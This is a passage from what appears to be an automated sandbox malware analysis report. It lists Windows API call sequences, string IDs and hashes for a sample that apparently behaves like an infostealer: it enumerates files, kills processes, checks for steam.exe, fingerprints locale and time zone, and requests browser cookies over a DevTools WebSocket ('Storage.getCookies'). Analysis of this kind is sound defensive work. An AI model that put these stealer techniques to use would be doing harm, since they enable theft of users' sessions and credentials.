                        • lstrcat.KERNEL32(?,015EEF10), ref: 0091DE7A
                        • lstrlen.KERNEL32(?), ref: 0091DE84
                        • lstrlen.KERNEL32(?), ref: 0091DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: 755d7a324e9df28f8bce5f76509cb3ba1641ac0a609e5f8f82ddd6e16af646f2
                        • Instruction ID: cb419270df10a75799c44d2fe104afb9f22c7ebf69170cb32052ab9fb8fc20fe
                        • Opcode Fuzzy Hash: 755d7a324e9df28f8bce5f76509cb3ba1641ac0a609e5f8f82ddd6e16af646f2
                        • Instruction Fuzzy Hash: 98615071A10208AFCB24EF74DD89AEE77B9BF88300F1045A8B50A97291DF34AB44CF51
                        APIs
                        • wsprintfA.USER32 ref: 0091D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091D564
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091D584
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091D59E
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091D5E3
                        • lstrcat.KERNEL32(?,015F01C8), ref: 0091D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0091D60B
                        • lstrcat.KERNEL32(?,?), ref: 0091D61C
                        • lstrcat.KERNEL32(?,00931794), ref: 0091D62E
                        • lstrcat.KERNEL32(?,?), ref: 0091D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091D737
                        • FindClose.KERNEL32(00000000), ref: 0091D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 2dcebbab5a0e577bbb57a4771141bce0c84b7754837c14cb98d69452a119ce66
                        • Instruction ID: afe3570da637aabfd2039a2112063cd18cd4f16560669e9caf766bbabaee7b7a
                        • Opcode Fuzzy Hash: 2dcebbab5a0e577bbb57a4771141bce0c84b7754837c14cb98d69452a119ce66
                        • Instruction Fuzzy Hash: 09615471A102199FCB24EF74DD88ADE77B9EF88300F1045A5F549A7291DF34AA84CF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: d157d18dab61f47a8cbdffe537fa61fdfafbe1fd7dada5f8456222d986abf866
                        • Instruction ID: bae521129b9b953cb3e8f47c9c03f43c0105376d53f44b336c2c81c78bd8b49a
                        • Opcode Fuzzy Hash: d157d18dab61f47a8cbdffe537fa61fdfafbe1fd7dada5f8456222d986abf866
                        • Instruction Fuzzy Hash: 74A26971E012699FDF20DFA8D8407EDBBB6BF88300F1585A9E518A7285DB705E85CF90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009123D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009123F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912402
                        • lstrlen.KERNEL32(\*.*), ref: 0091240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00912436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00912486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 7b1a7e81fb6d8a513b9becf7f1c9fb2e03bcd13d8b283b02e0ce0f5ac1d13ecf
                        • Instruction ID: b30fc1c6497316f6af7ea81225365a93369921b7e49aa5a98da68c9dbf05ea2b
                        • Opcode Fuzzy Hash: 7b1a7e81fb6d8a513b9becf7f1c9fb2e03bcd13d8b283b02e0ce0f5ac1d13ecf
                        • Instruction Fuzzy Hash: 6F414C317116199FCB22FF28DE89BDE77A9AF94304F145124B85AA72E1CF70DC498B90
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009246B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 009246C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 009246DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 009246ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00924702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00924711
                        • CloseHandle.KERNEL32(00000000), ref: 00924718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00924726
                        • CloseHandle.KERNEL32(00000000), ref: 00924731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 578104d2fc6d019a614686f01fb3b469353ba22088de469354737db600b205e1
                        • Instruction ID: 01086f1256b4677c52778b9fa58dcefcc0078317592c4354cf69bf9f1e1e1469
                        • Opcode Fuzzy Hash: 578104d2fc6d019a614686f01fb3b469353ba22088de469354737db600b205e1
                        • Instruction Fuzzy Hash: 86018C31601224ABE7215B60EC8DFFE3B7CEB49B51F100198F909D7194EFB499848F65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00924628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00924638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0092464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00924660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00924672
                        • CloseHandle.KERNEL32(00000000), ref: 0092467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: a08e3ab881b3a83efddb8401ae1e6780ab5657e4289aeb2a2382fef7baa81dcd
                        • Instruction ID: 594bc9772280858a38aff3bec0bac16a5ab6a69b66b8303b302267ba9eadf8bc
                        • Opcode Fuzzy Hash: a08e3ab881b3a83efddb8401ae1e6780ab5657e4289aeb2a2382fef7baa81dcd
                        • Instruction Fuzzy Hash: 330162716012249BE7209B60AC89FEE77BCEF09750F0401D5F908D2040EFB499948BE5
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914B7F
                        • lstrlen.KERNEL32(00934CA8), ref: 00914B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BA7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 00914BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00914BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: 871285b995a095743fbfeb2cae03f2973f76e7657637a1ff0fd7f2899cfe94f6
                        • Instruction ID: 9c08961cfcb05a5a873c4182da27c9255636d54d762f80878c456e3704d94009
                        • Opcode Fuzzy Hash: 871285b995a095743fbfeb2cae03f2973f76e7657637a1ff0fd7f2899cfe94f6
                        • Instruction Fuzzy Hash: EB313B3172551A9FCB22EF68EE89BDE77B9AF94300F101124F816A7291CF70EC458B91
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00922D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00922DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00922DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00922DEC
                        • LocalFree.KERNEL32(00000000), ref: 00922FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 3ca322328071fb69cda4c0f4e0f547bac6a37b7ad52699d64e0ff1596dcd1203
                        • Instruction ID: 212f0d9072c37fc32816dcd4d2973e9cd0acfc4c1b214268468e7c10cfafde5f
                        • Opcode Fuzzy Hash: 3ca322328071fb69cda4c0f4e0f547bac6a37b7ad52699d64e0ff1596dcd1203
                        • Instruction Fuzzy Hash: 07B13C71900224DFC715CF18E948B99B7F5FF44324F2AC1A9D409AB2AAD7769C82DF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8EI?$Aas$caFz$n@~$qm?$r>)$)N
                        • API String ID: 0-2607675103
                        • Opcode ID: 4d354f86efc43e5cca99af830a3a93832f9a0b409128cf68f0099c4323943484
                        • Instruction ID: 55cd534e84ef2d80a1bfc12253e3cb1121906b52cf92de7a04ee7a49e44bfb59
                        • Opcode Fuzzy Hash: 4d354f86efc43e5cca99af830a3a93832f9a0b409128cf68f0099c4323943484
                        • Instruction Fuzzy Hash: CCB2E3F360C2049FE304AE2DEC8567ABBE9EF94320F16493DE6C5C7744EA3598418697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7Ew}$8=_$TnO?$Xv|$a~?u$W}w$ilK
                        • API String ID: 0-3619895878
                        • Opcode ID: 743a9d8d6be17e0e01001d614686826b846ebe71d9fa47c20c98142aa7aa56c2
                        • Instruction ID: d4a0062ba2bb0c5bfaaba9ab0bc587c9e4d7c02a67c8c35b1f0fea6e3543778b
                        • Opcode Fuzzy Hash: 743a9d8d6be17e0e01001d614686826b846ebe71d9fa47c20c98142aa7aa56c2
                        • Instruction Fuzzy Hash: 6CA2F7F3A0C2009FE7046E2DEC8567ABBE5EF94720F1A493DE6C5C7744EA3598018796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #rr_$$Ug]$*G}$<tf$Iao$^z]
                        • API String ID: 0-3992705258
                        • Opcode ID: d7bcdc73477f3206fbd3bf4e835451b29a4be0b092b78b85ed0a2f224d11d6af
                        • Instruction ID: 027dbbd743cc2e04e3ced7c3c17c7bf4d400e735dc3cd3666436bd5a16a0d8de
                        • Opcode Fuzzy Hash: d7bcdc73477f3206fbd3bf4e835451b29a4be0b092b78b85ed0a2f224d11d6af
                        • Instruction Fuzzy Hash: ACB2F6F390C204AFE7046E2DEC8567AFBE5EF94220F1A4A3DEAC4C3744E67558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &Hp'$.T?_$K&1o$u}_u$~#W?$%sW
                        • API String ID: 0-3163407309
                        • Opcode ID: 714105b66ddade1817e34ef1ed5e639e231ee0f938e6f949beeeb857fdbac938
                        • Instruction ID: 6b4b618ef9603ae78027f51efa8cd2363ed251d0d04449ba2ce1aee80856664f
                        • Opcode Fuzzy Hash: 714105b66ddade1817e34ef1ed5e639e231ee0f938e6f949beeeb857fdbac938
                        • Instruction Fuzzy Hash: 31B22AF3A0C204AFE304AE2DEC8577AB7E9EF94720F1A853DE6C4C7744E63558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )3^$7p?$T%{$T%{$e_O$k~~w
                        • API String ID: 0-3086935203
                        • Opcode ID: 45217cce17f9277a68b12e0f71c1b1de8361bd85141cb1cd7c8ea2f3da60d11c
                        • Instruction ID: cd1f451af1829f5518995c3c4e965fa6ae36b1948d497dc13c61c6d81e12692c
                        • Opcode Fuzzy Hash: 45217cce17f9277a68b12e0f71c1b1de8361bd85141cb1cd7c8ea2f3da60d11c
                        • Instruction Fuzzy Hash: 6CB2E5F3A0C2009FE7086E2DEC8577ABBE9EB94320F1A453DE6C5C7744EA3558058697
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00922C58
                        • wsprintfA.USER32 ref: 00922C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 6f1ce890aa9549b5d541b8fac72d2e40023153d7a4ce4af3c47b5f9b8bf9adef
                        • Instruction ID: 2d1b32427a0666b4b2ba5f3be01eaa42e9bdec4ace2a46d76c6f557231e9c9ca
                        • Opcode Fuzzy Hash: 6f1ce890aa9549b5d541b8fac72d2e40023153d7a4ce4af3c47b5f9b8bf9adef
                        • Instruction Fuzzy Hash: 45012671A04614BBCB1C9F58DC4AF6EBB6DEB84721F104369F916DB3C0DBB419008AD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: =6?U$X(wk$tw-$5rW$k;W
                        • API String ID: 0-806636559
                        • Opcode ID: 4de8c01ecc27c735a1a03822ec4f70ce098239cab38657dcdd2e07573a948e91
                        • Instruction ID: 3601fea0f214eee60eaf2fb3f3b6bbc44745653fefcb5f64e085d9e51f868198
                        • Opcode Fuzzy Hash: 4de8c01ecc27c735a1a03822ec4f70ce098239cab38657dcdd2e07573a948e91
                        • Instruction Fuzzy Hash: 7DB2F5F360C2009FE7046E2DEC8567ABBE9EF94320F164A3DEAC5C7744EA3558418697
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00921B72
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092184F
                          • Part of subcall function 00921820: lstrlen.KERNEL32(015D7010), ref: 00921860
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 00921887
                          • Part of subcall function 00921820: lstrcat.KERNEL32(00000000,00000000), ref: 00921892
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 009218C1
                          • Part of subcall function 00921820: lstrlen.KERNEL32(00934FA0), ref: 009218D3
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 009218F4
                          • Part of subcall function 00921820: lstrcat.KERNEL32(00000000,00934FA0), ref: 00921900
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 0092192F
                        • sscanf.NTDLL ref: 00921B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00921BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00921BC6
                        • ExitProcess.KERNEL32 ref: 00921BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
